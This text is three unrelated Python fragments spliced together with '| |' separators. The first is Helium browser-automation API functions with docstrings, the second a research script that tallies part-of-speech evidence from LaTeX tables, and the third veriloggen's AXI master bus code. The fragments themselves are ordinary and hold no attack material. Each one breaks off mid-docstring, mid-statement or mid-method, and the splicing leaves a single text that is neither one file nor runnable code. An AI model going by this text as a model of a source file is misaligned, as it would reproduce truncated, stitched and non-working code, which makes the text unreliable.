For more advanced configuration, use the `options` parameter::
from selenium.webdriver import FirefoxOptions
options = FirefoxOptions()
options.add_argument("--width=2560")
options.add_argument("--height=1440")
start_firefox(options=options)
On shutdown of the Python interpreter, Helium cleans up all resources used
for controlling the browser (such as the geckodriver process), but does
not close the browser itself. If you want to terminate the browser at the
end of your script, use the following command::
kill_browser()
"""
return _get_api_impl().start_firefox_impl(url, headless, options)
def go_to(url):
"""
:param url: URL to open.
:type url: str
Opens the specified URL in the current web browser window. For instance::
go_to("google.com")
"""
_get_api_impl().go_to_impl(url)
def set_driver(driver):
"""
Sets the Selenium WebDriver used to execute Helium commands. See also
:py:func:`get_driver`.
"""
_get_api_impl().set_driver_impl(driver)
def get_driver():
"""
Returns the Selenium WebDriver currently used by Helium to execute all
commands. Each Helium command such as ``click("Login")`` is translated to a
sequence of Selenium commands that are issued to this driver.
"""
return _get_api_impl().get_driver_impl()
def write(text, into=None):
"""
:param text: The text to be written.
:type text: one of str, unicode
:param into: The element to write into.
:type into: one of str, unicode, :py:class:`HTMLElement`, \
:py:class:`selenium.webdriver.remote.webelement.WebElement`, :py:class:`Alert`
Types the given text into the active window. If parameter 'into' is given,
writes the text into the text field or element identified by that parameter.
Common examples of 'write' are::
write("Hello World!")
write("user12345", into="Username:")
write("Michael", into=Alert("Please enter your name"))
"""
_get_api_impl().write_impl(text, into)
def press(key):
"""
:param key: Key or combination of keys to be pressed.
Presses the given key or key combination. To press a normal letter key such
as 'a' simply call `press` for it::
press('a')
You can also simulate the pressing of upper case characters that way::
press('A')
The special keys you can press are those given by Selenium's class
:py:class:`selenium.webdriver.common.keys.Keys`. Helium makes all those keys
available through its namespace, so you can just use them without having to
refer to :py:class:`selenium.webdriver.common.keys.Keys`. For instance, to
press the Enter key::
press(ENTER)
To press multiple keys at the same time, concatenate them with `+`. For
example, to press Control + a, call::
press(CONTROL + 'a')
"""
_get_api_impl().press_impl(key)
NULL = Keys.NULL
CANCEL = Keys.CANCEL
HELP = Keys.HELP
BACK_SPACE = Keys.BACK_SPACE
TAB = Keys.TAB
CLEAR = Keys.CLEAR
RETURN = Keys.RETURN
ENTER = Keys.ENTER
SHIFT = Keys.SHIFT
LEFT_SHIFT = Keys.LEFT_SHIFT
CONTROL = Keys.CONTROL
LEFT_CONTROL = Keys.LEFT_CONTROL
ALT = Keys.ALT
LEFT_ALT = Keys.LEFT_ALT
PAUSE = Keys.PAUSE
ESCAPE = Keys.ESCAPE
SPACE = Keys.SPACE
PAGE_UP = Keys.PAGE_UP
PAGE_DOWN = Keys.PAGE_DOWN
END = Keys.END
HOME = Keys.HOME
LEFT = Keys.LEFT
ARROW_LEFT = Keys.ARROW_LEFT
UP = Keys.UP
ARROW_UP = Keys.ARROW_UP
RIGHT = Keys.RIGHT
ARROW_RIGHT = Keys.ARROW_RIGHT
DOWN = Keys.DOWN
ARROW_DOWN = Keys.ARROW_DOWN
INSERT = Keys.INSERT
DELETE = Keys.DELETE
SEMICOLON = Keys.SEMICOLON
EQUALS = Keys.EQUALS
NUMPAD0 = Keys.NUMPAD0
NUMPAD1 = Keys.NUMPAD1
NUMPAD2 = Keys.NUMPAD2
NUMPAD3 = Keys.NUMPAD3
NUMPAD4 = Keys.NUMPAD4
NUMPAD5 = Keys.NUMPAD5
NUMPAD6 = Keys.NUMPAD6
NUMPAD7 = Keys.NUMPAD7
NUMPAD8 = Keys.NUMPAD8
NUMPAD9 = Keys.NUMPAD9
MULTIPLY = Keys.MULTIPLY
ADD = Keys.ADD
SEPARATOR = Keys.SEPARATOR
SUBTRACT = Keys.SUBTRACT
DECIMAL = Keys.DECIMAL
DIVIDE = Keys.DIVIDE
F1 = Keys.F1
F2 = Keys.F2
F3 = Keys.F3
F4 = Keys.F4
F5 = Keys.F5
F6 = Keys.F6
F7 = Keys.F7
F8 = Keys.F8
F9 = Keys.F9
F10 = Keys.F10
F11 = Keys.F11
F12 = Keys.F12
META = Keys.META
COMMAND = Keys.COMMAND
def click(element):
"""
:param element: The element or point to click.
:type element: str, unicode, :py:class:`HTMLElement`, \
:py:class:`selenium.webdriver.remote.webelement.WebElement` or :py:class:`Point`
Clicks on the given element or point. Common examples are::
click("Sign in")
click(Button("OK"))
click(Point(200, 300))
click(ComboBox("File type").top_left + (50, 0))
"""
_get_api_impl().click_impl(element)
def doubleclick(element):
"""
:param element: The element or point to click.
:type element: str, unicode, :py:class:`HTMLElement`, \
:py:class:`selenium.webdriver.remote.webelement.WebElement` or :py:class:`Point`
Performs a double-click on the given element or point. For example::
doubleclick("Double click here")
doubleclick(Image("Directories"))
doubleclick(Point(200, 300))
doubleclick(TextField("Username").top_left - (0, 20))
"""
_get_api_impl().doubleclick_impl(element)
def drag(element, to):
"""
:param element: The element or point to drag.
:type element: str, unicode, :py:class:`HTMLElement`, \
:py:class:`selenium.webdriver.remote.webelement.WebElement` or :py:class:`Point`
:param to: The element or point to drag to.
:type to: str, unicode, :py:class:`HTMLElement`, \
:py:class:`selenium.webdriver.remote.webelement.WebElement` or :py:class:`Point`
Drags the given element or point to the given location. For example::
drag("Drag me!", to="Drop here.")
The dragging is performed by hovering the mouse cursor over ``element``,
pressing and holding the left mouse button, moving the mouse cursor over
``to``, and then releasing the left mouse button again.
This function is exclusively used for dragging elements inside one web page.
If you wish to drag a file from the hard disk onto the browser window (eg.
to initiate a file upload), use function :py:func:`drag_file`.
"""
_get_api_impl().drag_impl(element, to)
def press_mouse_on(element):
_get_api_impl().press_mouse_on_impl(element)
def release_mouse_over(element):
_get_api_impl().release_mouse_over_impl(element)
def find_all(predicate):
"""
Lets you find all occurrences of the given GUI element predicate. For
instance, the following statement returns a list of all buttons with label
"Open"::
find_all(Button("Open"))
Other examples are::
find_all(Window())
find_all(TextField("Address line 1"))
The function returns a list of elements of the same type as the passed-in
parameter. For instance, ``find_all(Button(...))`` yields a list whose
elements are of type :py:class:`Button`.
In a typical usage scenario, you want to pick out one of the occurrences
returned by :py:func:`find_all`. In such cases, :py:func:`list.sort` can
be very useful. For example, to find the leftmost "Open" button, you can
write::
buttons = find_all(Button("Open"))
leftmost_button = sorted(buttons, key=lambda button: button.x)[0]
"""
return _get_api_impl().find_all_impl(predicate)
def scroll_down(num_pixels=100):
"""
Scrolls down the page the given number of pixels.
"""
_get_api_impl().scroll_down_impl(num_pixels)
def scroll_up(num_pixels=100):
"""
Scrolls the the page up the given number of pixels.
"""
_get_api_impl().scroll_up_impl(num_pixels)
def scroll_right(num_pixels=100):
"""
Scrolls the page to the right the given number of pixels.
"""
_get_api_impl().scroll_right_impl(num_pixels)
def scroll_left(num_pixels=100):
"""
Scrolls the page to the left the given number of pixels.
"""
_get_api_impl().scroll_left_impl(num_pixels)
def hover(element):
"""
:param element: The element or point to hover.
:type element: str, unicode, :py:class:`HTMLElement`, \
:py:class:`selenium.webdriver.remote.webelement.WebElement` or :py:class:`Point`
Hovers the mouse cursor over the given element or point. For example::
hover("File size")
hover(Button("OK"))
hover(Link("Download"))
hover(Point(200, 300))
hover(ComboBox("File type").top_left + (50, 0))
"""
_get_api_impl().hover_impl(element)
def rightclick(element):
"""
:param element: The element or point to click.
:type element: str, unicode, :py:class:`HTMLElement`, \
:py:class:`selenium.webdriver.remote.webelement.WebElement` or :py:class:`Point`
Performs a right click on the given element or point. For example::
rightclick("Something")
rightclick(Point(200, 300))
rightclick(Image("captcha"))
"""
_get_api_impl().rightclick_impl(element)
def select(combo_box, value):
"""
:param combo_box: The combo box whose value should be changed.
:type combo_box: str, unicode or :py:class:`ComboBox`
:param value: The visible value of the combo box to be selected.
Selects a value from a combo box. For example::
select("Language", "English")
select(ComboBox("Language"), "English")
"""
_get_api_impl().select_impl(combo_box, value)
def drag_file(file_path, to):
"""
Simulates the dragging of a file from the computer over the browser window
and dropping it over the given element. This allows, for example, to attach
files to emails in Gmail::
click("COMPOSE")
write("<EMAIL>", into="To")
write("Email subject", into="Subject")
drag_file(r"C:\\Documents\\notes.txt", to="Drop files here")
"""
_get_api_impl().drag_file_impl(file_path, to)
def attach_file(file_path, to=None):
"""
:param file_path: The path of the file to be attached.
:param to: The file input element to which the file should be attached.
Allows attaching a file to a file input element. For instance::
attach_file("c:/test.txt", to="Please select a file:")
The file input element is identified by its label. If you omit the ``to=``
parameter, then Helium attaches the file to the first file input element it
finds on the page.
"""
_get_api_impl().attach_file_impl(file_path, to=to)
def refresh():
"""
Refreshes the current page. If an alert dialog is open, then Helium first
closes it.
"""
_get_api_impl().refresh_impl()
def wait_until(condition_fn, timeout_secs=10, interval_secs=0.5):
"""
:param condition_fn: A function taking no arguments that represents the \
condition to be waited for.
:param timeout_secs: The timeout, in seconds, after which the condition is \
deemed to have failed.
:param interval_secs: The interval, in seconds, at which the condition \
function is polled to determine whether the wait has | |
measures])
peaks = sum(['hp' in i or 'ph' in i for i in measures])+inte
adict_[layer][synset] = ((per, inte, hubs), peaks)
measures = adict[layer][synset]
per = sum([i[0]=='p' for i in measures])
inte = sum([i[0]=='i' for i in measures])
hubs = sum([i[0]=='h' for i in measures])
peaks = sum(['hp' in i or 'ph' in i for i in measures])+inte
adict2[layer][synset] = ((per, inte, hubs), peaks)
measures_ = [i for i in measures if '_' not in i]
per = sum([i[0]=='p' for i in measures_])
inte = sum([i[0]=='i' for i in measures_])
hubs = sum([i[0]=='h' for i in measures_])
peaks_ = sum(['hp' in i or 'ph' in i for i in measures_])+inte
adict3[layer][synset] = ((per, inte, hubs), peaks_)
total = [0, 0, 0]
for measure in measures:
val = 1
if '_' in measure:
val *=.5
print('times .5 ===========<')
if '*' in measure:
val *= 2
if measure[0] == 'p':
total[0] += val
elif measure[0] == 'i':
total[1] += val
elif measure[0] == 'h':
total[2] += val
adict4[layer][synset] = (total, adict2[layer][synset][0], (peaks, len(measures)))
adict5[layer][synset] = (total, adict2[layer][synset][0],
(peaks, len(measures)), measures)
# if len(measures) >= 13:
adict6[layer][synset] = (total, adict2[layer][synset][0], (peaks, len(measures)))
labelsh = ['synset', 'p.', 'i.', 'h', 'peaks']
labels = []
data = []
for layer in adict6:
for entry in adict6[layer]:
labels.append(entry)
data_ = adict6[layer][entry]
data.append([*data_[1], *data_[2]][:-1])
fname_ = TDIR+'posInlineTotal.tex'
caption = 'Counts of evidence of differences related to POS tags in the Erd\\"os sectors in each of the analyzed networks.'
g.tableHelpers.lTable(labels,labelsh,data,caption,fname_,two_decimal=False)
ME=g.tableHelpers.me
ME(fname_[:-4],"\\bf",[(0,i) for i in range(0,5)])
DL=g.tableHelpers.dl
DL(fname_[:-4]+"_",[1],[1,4],[2,4,7,9,10,11])
# ----------------------------------
files=os.listdir(TDIR)
files = [i for i in files if 'wnPOSInline' in i and '_' not in i
and 'Total' not in i and '-' not in i]
adict = {1:OrderedDict(), 2:{}, 3:{}}
for afile in files:
text = open(TDIR+afile,'r').read().replace('\\hline','').split('\\\\')[1:-1]
# t = [i[1:-1] for i in text if ' total' not in i]
t = [i[1:-1] for i in text]
t_ = [i.split(' & ') for i in t]
matrix = [[float(i) for i in j[2:]] for j in t_]
names = [i[0] for i in t_]
layer = 1
for array, name in zip(matrix, names):
if ' total' in name:
layer += 1
continue
if min(array) == 0:
continue
if max(array) < 5:
low_measure = 1
elif max(array) < 10:
low_measure = 2
else:
low_measure = 0
if max(array)/min(array) > 1.5:
difference = 2
elif max(array)/min(array) > 1.1:
difference = 1
else:
difference = 0
array_ = sorted(array)
a = array
if sum([i==j for i,j in zip(array, array_)]) == 3:
order = 'h'
elif sum([i==j for i,j in zip([a[2], a[0], a[1]], array_[::-1])]) == 3:
order = 'hp'
elif sum([i==j for i,j in zip(array, array_[::-1])]) == 3:
order = 'p'
elif sum([i==j for i,j in zip([a[0], a[2], a[1]], array_[::-1])]) == 3:
order = 'ph'
elif sum([i==j for i,j in zip([a[1], a[0], a[2]], array_[::-1])]) == 3:
order = 'ip'
elif sum([i==j for i,j in zip([a[1], a[2], a[0]], array_[::-1])]) == 3:
order = 'ih'
print(array)
print(name, difference, low_measure, order)
if difference == 0:
order = '-'
elif difference == 2:
order += '*'
if low_measure == 2:
order += '_'
elif low_measure == 1:
order += '__'
print(order)
if name in adict[layer]:
adict[layer][name].append(order)
else:
adict[layer][name] = [order]
adict_ = {1:OrderedDict(), 2:{}, 3:{}}
adict2 = {1:OrderedDict(), 2:{}, 3:{}}
adict3 = {1:OrderedDict(), 2:{}, 3:{}}
adict4 = {1:OrderedDict(), 2:{}, 3:{}}
adict5 = {1:OrderedDict(), 2:{}, 3:{}}
adict6 = {1:OrderedDict(), 2:{}, 3:{}}
print('\n\n\n =========================')
for layer in adict:
for synset in adict[layer]:
measures = adict[layer][synset]
per = sum([i[0]=='p' for i in measures])
inte = sum([i[0]=='i' for i in measures])
hubs = sum([i[0]=='h' for i in measures])
peaks = sum(['hp' in i or 'ph' in i for i in measures])+inte
adict_[layer][synset] = ((per, inte, hubs), peaks)
measures = adict[layer][synset]
per = sum([i[0]=='p' for i in measures])
inte = sum([i[0]=='i' for i in measures])
hubs = sum([i[0]=='h' for i in measures])
peaks = sum(['hp' in i or 'ph' in i for i in measures])+inte
adict2[layer][synset] = ((per, inte, hubs), peaks)
measures_ = [i for i in measures if '_' not in i]
per = sum([i[0]=='p' for i in measures_])
inte = sum([i[0]=='i' for i in measures_])
hubs = sum([i[0]=='h' for i in measures_])
peaks_ = sum(['hp' in i or 'ph' in i for i in measures_])+inte
adict3[layer][synset] = ((per, inte, hubs), peaks_)
total = [0, 0, 0]
for measure in measures:
val = 1
if '_' in measure:
val *=.5
print('times .5 ===========<')
if '*' in measure:
val *= 2
if measure[0] == 'p':
total[0] += val
elif measure[0] == 'i':
total[1] += val
elif measure[0] == 'h':
total[2] += val
adict4[layer][synset] = (total, adict2[layer][synset][0], (peaks, len(measures)))
adict5[layer][synset] = (total, adict2[layer][synset][0],
(peaks, len(measures)), measures)
# if len(measures) >= 13:
adict6[layer][synset] = (total, adict2[layer][synset][0], (peaks, len(measures)))
labelsh = ['synset', 'p.', 'i.', 'h', 'peaks']
labels = []
data = []
for layer in adict6:
for entry in adict6[layer]:
labels.append(entry)
data_ = adict6[layer][entry]
data.append([*data_[1], *data_[2]][:-1])
fname_ = TDIR+'wnPOSInlineTotal.tex'
caption = 'Counts of evidence of differences related to Wordnet POS tags in the Erd\\"os sectors in each of the analyzed networks.'
g.tableHelpers.lTable(labels,labelsh,data,caption,fname_,two_decimal=False)
ME=g.tableHelpers.me
ME(fname_[:-4],"\\bf",[(0,i) for i in range(0,5)])
DL=g.tableHelpers.dl
DL(fname_[:-4]+"_",[1,-4],[1,4],)
# ----------------------------------
files=os.listdir(TDIR)
files = [i for i in files if 'wnPOSInline2-n-' in i and '_' not in i
and 'Total' not in i and 'tag' in i]
adict = {1:OrderedDict(), 2:{}, 3:{}}
for afile in files:
text = open(TDIR+afile,'r').read().replace('\\hline','').split('\\\\')[1:-1]
# t = [i[1:-1] for i in text if ' total' not in i]
t = [i[1:-1] for i in text]
t_ = [i.split(' & ') for i in t]
matrix = [[float(i) for i in j[2:]] for j in t_]
names = [i[0] for i in t_]
layer = 1
for array, name in zip(matrix, names):
if ' total' in name:
layer += 1
continue
if min(array) == 0:
continue
if max(array) < 5:
low_measure = 1
elif max(array) < 10:
low_measure = 2
else:
low_measure = 0
if max(array)/min(array) > 1.5:
difference = 2
elif max(array)/min(array) > 1.1:
difference = 1
else:
difference = 0
array_ = sorted(array)
a = array
if sum([i==j for i,j in zip(array, array_)]) == 3:
order = 'h'
elif sum([i==j for i,j in zip([a[2], a[0], a[1]], array_[::-1])]) == 3:
order = 'hp'
elif sum([i==j for i,j in zip(array, array_[::-1])]) == 3:
order = 'p'
elif sum([i==j for i,j in zip([a[0], a[2], a[1]], array_[::-1])]) == 3:
order = 'ph'
elif sum([i==j for i,j in zip([a[1], a[0], a[2]], array_[::-1])]) == 3:
order = 'ip'
elif sum([i==j for i,j in zip([a[1], a[2], a[0]], array_[::-1])]) == 3:
order = 'ih'
print(array)
print(name, difference, low_measure, order)
if difference == 0:
order = '-'
elif difference == 2:
order += '*'
if low_measure == 2:
order += '_'
elif low_measure == 1:
order += '__'
print(order)
if name in adict[layer]:
adict[layer][name].append(order)
else:
adict[layer][name] = [order]
adict_ = {1:OrderedDict(), 2:{}, 3:{}}
adict2 = {1:OrderedDict(), 2:{}, 3:{}}
adict3 = {1:OrderedDict(), 2:{}, 3:{}}
adict4 = {1:OrderedDict(), 2:{}, 3:{}}
adict5 = {1:OrderedDict(), 2:{}, 3:{}}
adict6 = {1:OrderedDict(), 2:{}, 3:{}}
print('\n\n\n =========================')
for layer in adict:
for synset in adict[layer]:
measures = adict[layer][synset]
per = sum([i[0]=='p' for i in measures])
inte = sum([i[0]=='i' for i in measures])
hubs = sum([i[0]=='h' for i in measures])
peaks = sum(['hp' in i or 'ph' in i for i in measures])+inte
adict_[layer][synset] = ((per, inte, hubs), peaks)
measures = adict[layer][synset]
per = sum([i[0]=='p' for i in measures])
inte = sum([i[0]=='i' for i in measures])
hubs = sum([i[0]=='h' for i in measures])
peaks = sum(['hp' in i or 'ph' in i for i in measures])+inte
adict2[layer][synset] = ((per, inte, hubs), peaks)
measures_ = [i for i in measures if '_' not in i]
per = sum([i[0]=='p' for i in measures_])
inte = sum([i[0]=='i' for i in measures_])
hubs = sum([i[0]=='h' for i in measures_])
peaks_ = sum(['hp' in i or 'ph' in i for i in measures_])+inte
adict3[layer][synset] = ((per, inte, hubs), peaks_)
total = [0, 0, 0]
for measure in measures:
val = 1
if '_' in measure:
val *=.5
print('times .5 ===========<')
if '*' in measure:
val *= 2
if measure[0] == 'p':
total[0] | |
<reponame>leonardt/veriloggen
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import functools
import math
import veriloggen.core.vtypes as vtypes
from veriloggen.seq.seq import Seq
from veriloggen.fsm.fsm import FSM
import veriloggen.dataflow as _df
from veriloggen.dataflow.dataflow import DataflowManager
from veriloggen.dataflow.dtypes import make_condition, read_multi
from veriloggen.dataflow.dtypes import _Numeric as df_numeric
from . import util
def _connect_ready(m, var, val):
prev_assign = var._get_assign()
if not prev_assign:
var.assign(val)
else:
prev_assign.overwrite_right(
vtypes.Ors(prev_assign.statement.right, val))
m.remove(prev_assign)
m.append(prev_assign)
class AxiBase(object):
_I = util.t_Input
_O = util.t_OutputReg
def __init__(self, m, name=None, datawidth=32, addrwidth=32,
itype=None, otype=None, lite=False):
if itype is None:
itype = self._I
if otype is None:
otype = self._O
self.m = m
self.datawidth = datawidth
self.addrwidth = addrwidth
self.itype = itype
self.otype = otype
self.lite = lite
class AxiWriteAddress(AxiBase):
def __init__(self, m, name=None, datawidth=32, addrwidth=32,
itype=None, otype=None, lite=False):
AxiBase.__init__(self, m, name, datawidth,
addrwidth, itype, otype, lite)
self.awaddr = util.make_port(
m, self.otype, name + '_awaddr', self.addrwidth, initval=0)
if not self.lite:
self.awlen = util.make_port(
m, self.otype, name + '_awlen', 8, initval=0)
self.awvalid = util.make_port(
m, self.otype, name + '_awvalid', None, initval=0)
self.awready = util.make_port(
m, self.itype, name + '_awready', None, initval=0)
class AxiWriteData(AxiBase):
def __init__(self, m, name=None, datawidth=32, addrwidth=32,
itype=None, otype=None, lite=False):
AxiBase.__init__(self, m, name, datawidth,
addrwidth, itype, otype, lite)
self.wdata = util.make_port(
m, self.otype, name + '_wdata', self.datawidth, initval=0)
self.wstrb = util.make_port(
m, self.otype, name + '_wstrb', self.datawidth // 8, initval=0)
if not self.lite:
self.wlast = util.make_port(
m, self.otype, name + '_wlast', None, initval=0)
self.wvalid = util.make_port(
m, self.otype, name + '_wvalid', None, initval=0)
self.wready = util.make_port(
m, self.itype, name + '_wready', None, initval=0)
class AxiReadAddress(AxiBase):
def __init__(self, m, name=None, datawidth=32, addrwidth=32,
itype=None, otype=None, lite=False):
AxiBase.__init__(self, m, name, datawidth,
addrwidth, itype, otype, lite)
self.araddr = util.make_port(
m, self.otype, name + '_araddr', self.addrwidth, initval=0)
if not self.lite:
self.arlen = util.make_port(
m, self.otype, name + '_arlen', 8, initval=0)
self.arvalid = util.make_port(
m, self.otype, name + '_arvalid', None, initval=0)
self.arready = util.make_port(
m, self.itype, name + '_arready', None, initval=0)
class AxiReadData(AxiBase):
_O = util.t_Output
def __init__(self, m, name=None, datawidth=32, addrwidth=32,
itype=None, otype=None, lite=False):
AxiBase.__init__(self, m, name, datawidth,
addrwidth, itype, otype, lite)
self.rdata = util.make_port(
m, self.itype, name + '_rdata', self.datawidth, initval=0)
if not self.lite:
self.rlast = util.make_port(
m, self.itype, name + '_rlast', None, initval=0)
self.rvalid = util.make_port(
m, self.itype, name + '_rvalid', None, initval=0)
self.rready = util.make_port(
m, self.otype, name + '_rready', None, initval=0)
class AxiMasterWriteAddress(AxiWriteAddress):
pass
class AxiMasterWriteData(AxiWriteData):
pass
class AxiMasterReadAddress(AxiReadAddress):
pass
class AxiMasterReadData(AxiReadData):
pass
class AxiSlaveWriteAddress(AxiWriteAddress):
_I = util.t_Output
_O = util.t_Input
class AxiSlaveWriteData(AxiWriteData):
_I = util.t_Output
_O = util.t_Input
class AxiSlaveReadAddress(AxiReadAddress):
_I = util.t_Output
_O = util.t_Input
class AxiSlaveReadData(AxiReadData):
_I = util.t_OutputReg
_O = util.t_Input
class AxiMaster(object):
burst_size_width = 8
boundary_size = 4096
def __init__(self, m, name, clk, rst, datawidth=32, addrwidth=32,
lite=False, noio=False, nodataflow=False):
self.m = m
self.name = name
self.clk = clk
self.rst = rst
self.datawidth = datawidth
self.addrwidth = addrwidth
self.lite = lite
self.noio = noio
if not hasattr(self.m, 'masterbus'):
self.m.masterbus = []
self.m.masterbus.append(self)
itype = util.t_Wire if noio else None
otype = util.t_Reg if noio else None
self.waddr = AxiMasterWriteAddress(
m, name, datawidth, addrwidth, itype=itype, otype=otype, lite=lite)
self.wdata = AxiMasterWriteData(
m, name, datawidth, addrwidth, itype=itype, otype=otype, lite=lite)
self.raddr = AxiMasterReadAddress(
m, name, datawidth, addrwidth, itype=itype, otype=otype, lite=lite)
otype = util.t_Wire if noio else None
self.rdata = AxiMasterReadData(
m, name, datawidth, addrwidth, itype=itype, otype=otype, lite=lite)
self.seq = Seq(m, name, clk, rst)
self.write_counters = []
self.read_counters = []
if nodataflow:
self.df = None
else:
self.df = DataflowManager(self.m, self.clk, self.rst)
self._write_disabled = False
self._read_disabled = False
def disable_write(self):
ports = [self.waddr.awaddr(0)]
if not self.lite:
ports.append(self.waddr.awlen(0))
ports.extend([self.waddr.awvalid(0),
self.wdata.wdata(0),
self.wdata.wstrb(0),
self.wdata.wvalid(0)])
if not self.lite:
ports.append(self.wdata.wlast(0))
self.seq(
*ports
)
self._write_disabled = True
def disable_read(self):
ports = [self.raddr.araddr(0)]
if not self.lite:
ports.append(self.raddr.arlen(0))
ports.append(self.raddr.arvalid(0))
self.seq(
*ports
)
self.rdata.rready.assign(0)
self._read_disabled = True
def mask_addr(self, addr):
s = util.log2(self.datawidth // 8)
return (addr >> s) << s
def check_boundary(self, addr, length, datawidth=None, boundary_size=None):
if datawidth is None:
datawidth = self.datawidth
if boundary_size is None:
boundary_size = self.boundary_size
mask = boundary_size - 1
return ((addr & mask) + (length << util.log2(datawidth // 8))) >= boundary_size
def rest_boundary(self, addr, datawidth=None, boundary_size=None):
if datawidth is None:
datawidth = self.datawidth
if boundary_size is None:
boundary_size = self.boundary_size
mask = boundary_size - 1
return (vtypes.Int(boundary_size) - (addr & mask)) >> util.log2(datawidth // 8)
def write_request(self, addr, length=1, cond=None, counter=None):
"""
@return ack, (counter)
"""
if self._write_disabled:
raise TypeError('Write disabled.')
if self.lite:
if length != 1:
raise ValueError('length must be 1 for lite-interface.')
return self._write_request_lite(addr, cond)
return self._write_request_full(addr, length, cond, counter)
def _write_request_lite(self, addr, cond=None):
if cond is not None:
self.seq.If(cond)
ack = vtypes.Ors(self.waddr.awready, vtypes.Not(self.waddr.awvalid))
self.seq.If(ack)(
self.waddr.awaddr(addr),
self.waddr.awvalid(1),
)
# de-assert
self.seq.Delay(1)(
self.waddr.awvalid(0)
)
# retry
self.seq.If(vtypes.Ands(self.waddr.awvalid, vtypes.Not(self.waddr.awready)))(
self.waddr.awvalid(self.waddr.awvalid)
)
return ack
def _write_request_full(self, addr, length=1, cond=None, counter=None):
if isinstance(length, int) and length > 2 ** self.burst_size_width:
raise ValueError("length must be less than 257.")
if isinstance(length, int) and length < 1:
raise ValueError("length must be more than 0.")
if counter is not None and not isinstance(counter, vtypes.Reg):
raise TypeError("counter must be Reg or None.")
if cond is not None:
self.seq.If(cond)
ack = vtypes.Ors(self.waddr.awready, vtypes.Not(self.waddr.awvalid))
if counter is None:
counter = self.m.TmpReg(self.burst_size_width + 1, initval=0)
self.write_counters.append(counter)
self.seq.If(vtypes.Ands(ack, counter == 0))(
self.waddr.awaddr(addr),
self.waddr.awlen(length - 1),
self.waddr.awvalid(1),
counter(length)
)
self.seq.Then().If(length == 0)(
self.waddr.awvalid(0)
)
# de-assert
self.seq.Delay(1)(
self.waddr.awvalid(0)
)
# retry
self.seq.If(vtypes.Ands(self.waddr.awvalid, vtypes.Not(self.waddr.awready)))(
self.waddr.awvalid(self.waddr.awvalid)
)
return ack, counter
def write_data(self, data, counter=None, cond=None):
"""
@return ack, (last)
"""
if self._write_disabled:
raise TypeError('Write disabled.')
if self.lite:
return self._write_data_lite(data, cond)
return self._write_data_full(data, counter, cond)
def _write_data_lite(self, data, cond=None):
if cond is not None:
self.seq.If(cond)
ack = vtypes.Ors(self.wdata.wready, vtypes.Not(self.wdata.wvalid))
self.seq.If(ack)(
self.wdata.wdata(data),
self.wdata.wvalid(1),
self.wdata.wstrb(vtypes.Repeat(
vtypes.Int(1, 1), (self.wdata.datawidth // 8)))
)
# de-assert
self.seq.Delay(1)(
self.wdata.wvalid(0),
)
# retry
self.seq.If(vtypes.Ands(self.wdata.wvalid, vtypes.Not(self.wdata.wready)))(
self.wdata.wvalid(self.wdata.wvalid)
)
return ack
def _write_data_full(self, data, counter=None, cond=None):
if counter is not None and not isinstance(counter, vtypes.Reg):
raise TypeError("counter must be Reg or None.")
if counter is None:
counter = self.write_counters[-1]
if cond is not None:
self.seq.If(cond)
ack = vtypes.Ands(counter > 0,
vtypes.Ors(self.wdata.wready, vtypes.Not(self.wdata.wvalid)))
last = self.m.TmpReg(initval=0)
self.seq.If(vtypes.Ands(ack, counter > 0))(
self.wdata.wdata(data),
self.wdata.wvalid(1),
self.wdata.wlast(0),
self.wdata.wstrb(vtypes.Repeat(
vtypes.Int(1, 1), (self.wdata.datawidth // 8))),
counter.dec()
)
self.seq.Then().If(counter == 1)(
self.wdata.wlast(1),
last(1)
)
# de-assert
self.seq.Delay(1)(
self.wdata.wvalid(0),
self.wdata.wlast(0),
last(0)
)
# retry
self.seq.If(vtypes.Ands(self.wdata.wvalid, vtypes.Not(self.wdata.wready)))(
self.wdata.wvalid(self.wdata.wvalid),
self.wdata.wlast(self.wdata.wlast),
last(last)
)
return ack, last
def write_dataflow(self, data, counter=None, cond=None, when=None):
"""
@return done
'data' and 'when' must be dataflow variables
"""
if self.lite:
raise TypeError('lite interface support no dataflow operation.')
if self._write_disabled:
raise TypeError('Write disabled.')
if counter is not None and not isinstance(counter, vtypes.Reg):
raise TypeError("counter must be Reg or None.")
if counter is None:
counter = self.write_counters[-1]
ack = vtypes.Ands(counter > 0,
vtypes.Ors(self.wdata.wready, vtypes.Not(self.wdata.wvalid)))
last = self.m.TmpReg(initval=0)
if cond is None:
cond = ack
else:
cond = (cond, ack)
if when is None or not isinstance(when, df_numeric):
raw_data, raw_valid = data.read(cond=cond)
else:
data_list, raw_valid = read_multi(self.m, data, when, cond=cond)
raw_data = data_list[0]
when = data_list[1]
when_cond = make_condition(when, ready=cond)
if when_cond is not None:
raw_valid = vtypes.Ands(when_cond, raw_valid)
# write condition
self.seq.If(raw_valid)
self.seq.If(vtypes.Ands(ack, counter > 0))(
self.wdata.wdata(raw_data),
self.wdata.wvalid(1),
self.wdata.wlast(0),
self.wdata.wstrb(vtypes.Repeat(
vtypes.Int(1, 1), (self.wdata.datawidth // 8))),
counter.dec()
)
self.seq.Then().If(counter == 1)(
self.wdata.wlast(1),
last(1)
)
# de-assert
self.seq.Delay(1)(
self.wdata.wvalid(0),
self.wdata.wlast(0),
last(0)
)
# retry
self.seq.If(vtypes.Ands(self.wdata.wvalid, vtypes.Not(self.wdata.wready)))(
self.wdata.wvalid(self.wdata.wvalid),
self.wdata.wlast(self.wdata.wlast),
last(last)
)
done = vtypes.Ands(last, self.wdata.wvalid, self.wdata.wready)
return done
def read_request(self, addr, length=1, cond=None, counter=None):
"""
@return ack, (counter)
"""
if self._read_disabled:
raise TypeError('Read disabled.')
if self.lite:
if length != 1:
raise ValueError('length must be 1 for lite-interface.')
return self._read_request_lite(addr, cond)
return self._read_request_full(addr, length, cond, counter)
def _read_request_lite(self, addr, cond=None):
if cond is not None:
self.seq.If(cond)
ack = vtypes.Ors(self.raddr.arready, vtypes.Not(self.raddr.arvalid))
self.seq.If(ack)(
self.raddr.araddr(addr),
self.raddr.arvalid(1)
)
# de-assert
self.seq.Delay(1)(
self.raddr.arvalid(0)
)
# retry
self.seq.If(vtypes.Ands(self.raddr.arvalid, vtypes.Not(self.raddr.arready)))(
self.raddr.arvalid(self.raddr.arvalid)
)
return ack
def _read_request_full(self, addr, length=1, cond=None, counter=None):
if isinstance(length, int) and length > 2 ** self.burst_size_width:
raise ValueError("length must be less than 257.")
if isinstance(length, int) and length < 1:
raise ValueError("length must be more than 0.")
if counter is not None and not isinstance(counter, vtypes.Reg):
raise TypeError("counter must be Reg or None.")
if cond is not None:
self.seq.If(cond)
